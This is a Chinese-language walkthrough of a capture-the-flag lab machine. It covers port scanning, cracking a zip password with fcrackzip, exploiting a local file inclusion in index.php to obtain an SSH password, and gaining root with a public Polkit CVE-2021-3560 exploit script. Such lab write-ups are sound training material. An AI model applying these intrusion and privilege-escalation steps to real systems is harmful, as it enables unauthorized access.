（一）信息收集

查询目标靶机ip，目标机：192.168.241.142

arp-scan -l

照常扫一下端口，发现开放21（ftp服务），22（ssh服务），80（web服务）三个端口

nmap -A -T4 192.168.241.142

发现开放21ftp端口，尝试访问。发现一个压缩包，下载下来发现有两个加密文件是包含关系，那我们就需要解开第一层密码。

ftp://（目标机ip）

ftp://192.168.241.142

(注：我这里kali自带浏览器无法直接访问，用自己电脑的浏览器可以直接访问)

我们可以用Fcrackzip来进行密码爆破

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip

密码为：072528035

 输入密码后得到respectmydrip.txt文件,另外一个secret.zip暂时爆不出来密码。

（二）目录扫描

然后我们在扫一下目录，发现几个结果分别访问一下。

 访问robots.txt

 访问一下/dripisreal.txt

你好亲爱的黑客，

选择这首歌词：

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

数一数n个单词，并排放置，然后md5求和

例如，md5你好你好

这是ssh的密码

这打开后就是一首歌，但我没有理解他这个怎么排列的。

然后我们在访问下 /etc/dripispowerful.html 发现无法访问

 网上搜了一下发现是在index.php界面有文件包含漏洞

http://192.168.241.142/index.php?drip=/etc/dripispowerful.html

 查看源码得到密码

（三）ssh远程登录

发现该密码还不是前面secret.zip的密码

前面端口扫描发现开放22端口，我们尝试ssh连接,成功登录

ssh thugger@本机ip

ssh  thugger@192.168.241.142           
密码：imdrippinbiatch

 在该目录下找到第一个flag

 （四）内网提权

ps -ef //查看当前进程情况

这里搜索知道polkitd漏洞，直接下载CVE-2021-3560.py

https://github.com/Almorabea/Polkit-exploit
然后将CVE-2021-3560.py直接拖入目标靶机（已知靶机密码：imdrippinbiatch）

可以看到靶机目录下有CVE-2021-3560.py，直接执行。

python3 CVE-2021-3560.py，获取到root权限。

进入~目录

cd ~

直接查看root.txt发现第二个flag

（五）靶机总结

1.开放ftp端口，可以进行访问。

2.Fcrackzip来进行密码爆破

3.polkitd漏洞，CVE-2021-3560